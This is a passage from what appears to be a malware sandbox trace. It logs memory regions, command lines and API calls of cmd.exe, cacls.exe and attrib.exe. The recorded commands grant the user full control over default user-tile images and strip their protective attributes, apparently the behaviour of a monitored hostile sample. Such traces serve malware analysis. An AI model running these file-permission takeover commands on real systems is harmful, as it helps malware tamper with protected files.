AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27527 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27528 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27529 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27530 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 27531 start_va = 0x860000 end_va = 0x868fff entry_point = 0x860000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27532 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27533 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27534 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27535 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 27536 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27537 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27538 start_va = 0x20000 end_va = 0x2ffff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27539 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27540 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 27541 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 27542 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27543 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27544 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27545 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27546 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27547 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") 
Region: id = 27548 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 583 os_tid = 0x7ec Thread: id = 584 os_tid = 0x3a4 Process: id = "411" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ca0" os_pid = "0x828" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "409" os_parent_pid = "0x114" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27549 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27550 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27551 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27552 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 27553 start_va = 0xd80000 end_va = 0xd86fff entry_point = 0xd80000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 27554 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = 
mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27555 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27556 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27557 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27558 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27559 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27560 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27561 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27562 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 27563 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 27564 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 27565 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = 
"kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27566 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27567 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27568 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27569 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27570 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27571 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27572 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27573 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27574 start_va = 0x773e0000 end_va = 0x7742dfff 
entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27575 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27576 start_va = 0x260000 end_va = 0x327fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 27577 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27578 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 585 os_tid = 0xfdc Process: id = "412" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0x9a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27579 start_va = 0x10000 
end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27580 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27581 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27582 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 27583 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27584 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27585 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27586 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27587 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27588 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27589 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27590 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000020000" filename = "" Region: id = 27591 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27592 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 27593 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 27594 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27595 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27596 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27597 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27598 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27599 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27600 start_va = 0x76d70000 end_va = 0x76e0cfff 
entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27601 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27602 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27603 start_va = 0x490000 end_va = 0x557fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 27604 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27605 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27606 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 27607 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 27608 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 27609 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 27610 start_va = 0x560000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 27611 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 27612 start_va = 0x1270000 end_va = 0x13d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Region: id = 27613 start_va = 0x13e0000 end_va = 0x16aefff entry_point = 0x13e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 586 os_tid = 0x90 [0189.289] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af81c | out: lpSystemTimeAsFileTime=0x1af81c*(dwLowDateTime=0xa5badaa0, dwHighDateTime=0x1d440a9)) [0189.289] GetCurrentProcessId () returned 0x9a8 [0189.289] GetCurrentThreadId () returned 0x90 [0189.289] GetTickCount () returned 0x35f5e [0189.289] QueryPerformanceCounter (in: lpPerformanceCount=0x1af814 | out: lpPerformanceCount=0x1af814*=24607828930) returned 1 [0189.290] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0189.290] __set_app_type (_Type=0x1) [0189.290] __p__fmode () returned 0x76b331f4 [0189.290] __p__commode () returned 0x76b331fc [0189.290] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0189.290] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0189.290] GetCurrentThreadId () returned 0x90 [0189.290] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x90) returned 0x38 [0189.290] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0189.290] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0189.290] SetThreadUILanguage (LangId=0x0) returned 0x409 [0189.290] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0189.290] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af7ac | out: phkResult=0x1af7ac*=0x0) returned 0x2 [0189.290] VirtualQuery (in: lpAddress=0x1af7e3, lpBuffer=0x1af77c, dwLength=0x1c | out: lpBuffer=0x1af77c*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0189.290] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1af77c, dwLength=0x1c | out: lpBuffer=0x1af77c*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0189.291] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1af77c, dwLength=0x1c | out: lpBuffer=0x1af77c*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0189.291] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1af77c, dwLength=0x1c | out: lpBuffer=0x1af77c*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0189.291] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1af77c, dwLength=0x1c | out: lpBuffer=0x1af77c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0189.291] GetConsoleOutputCP () returned 0x1b5 [0189.291] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0189.291] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0189.291] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.291] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0189.291] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.291] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0189.291] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.291] 
SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0189.291] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.291] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0189.292] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.292] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0189.292] GetEnvironmentStringsW () returned 0x3a0308* [0189.292] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0189.292] GetEnvironmentStringsW () returned 0x3a0308* [0189.292] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0189.292] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae71c | out: phkResult=0x1ae71c*=0x40) returned 0x0 [0189.292] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x0, lpData=0x1ae728*=0xb8, lpcbData=0x1ae720*=0x1000) returned 0x2 [0189.292] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x4, lpData=0x1ae728*=0x1, lpcbData=0x1ae720*=0x4) returned 0x0 [0189.292] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x0, lpData=0x1ae728*=0x1, lpcbData=0x1ae720*=0x1000) returned 0x2 [0189.292] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x4, lpData=0x1ae728*=0x0, lpcbData=0x1ae720*=0x4) returned 0x0 [0189.292] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x4, lpData=0x1ae728*=0x40, lpcbData=0x1ae720*=0x4) returned 0x0 [0189.292] 
RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x4, lpData=0x1ae728*=0x40, lpcbData=0x1ae720*=0x4) returned 0x0 [0189.292] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x0, lpData=0x1ae728*=0x40, lpcbData=0x1ae720*=0x1000) returned 0x2 [0189.292] RegCloseKey (hKey=0x40) returned 0x0 [0189.292] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae71c | out: phkResult=0x1ae71c*=0x40) returned 0x0 [0189.292] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x0, lpData=0x1ae728*=0x40, lpcbData=0x1ae720*=0x1000) returned 0x2 [0189.292] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x4, lpData=0x1ae728*=0x1, lpcbData=0x1ae720*=0x4) returned 0x0 [0189.293] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x0, lpData=0x1ae728*=0x1, lpcbData=0x1ae720*=0x1000) returned 0x2 [0189.293] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x4, lpData=0x1ae728*=0x0, lpcbData=0x1ae720*=0x4) returned 0x0 [0189.293] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x4, lpData=0x1ae728*=0x9, lpcbData=0x1ae720*=0x4) returned 0x0 [0189.293] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", 
lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x4, lpData=0x1ae728*=0x9, lpcbData=0x1ae720*=0x4) returned 0x0 [0189.293] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x0, lpData=0x1ae728*=0x9, lpcbData=0x1ae720*=0x1000) returned 0x2 [0189.293] RegCloseKey (hKey=0x40) returned 0x0 [0189.293] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886397 [0189.293] srand (_Seed=0x5b886397) [0189.293] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\"" [0189.293] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\"" [0189.293] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0189.293] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0189.293] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0189.293] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0189.293] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, 
